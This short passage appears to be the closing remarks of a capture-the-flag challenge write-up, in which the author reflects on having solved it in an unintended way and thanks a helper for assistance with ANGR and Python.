This was quite a nice challenge, however I feel that I didn’t solve it the way the author intended. I would like to thank @1amtom for his help with ANGR and Python.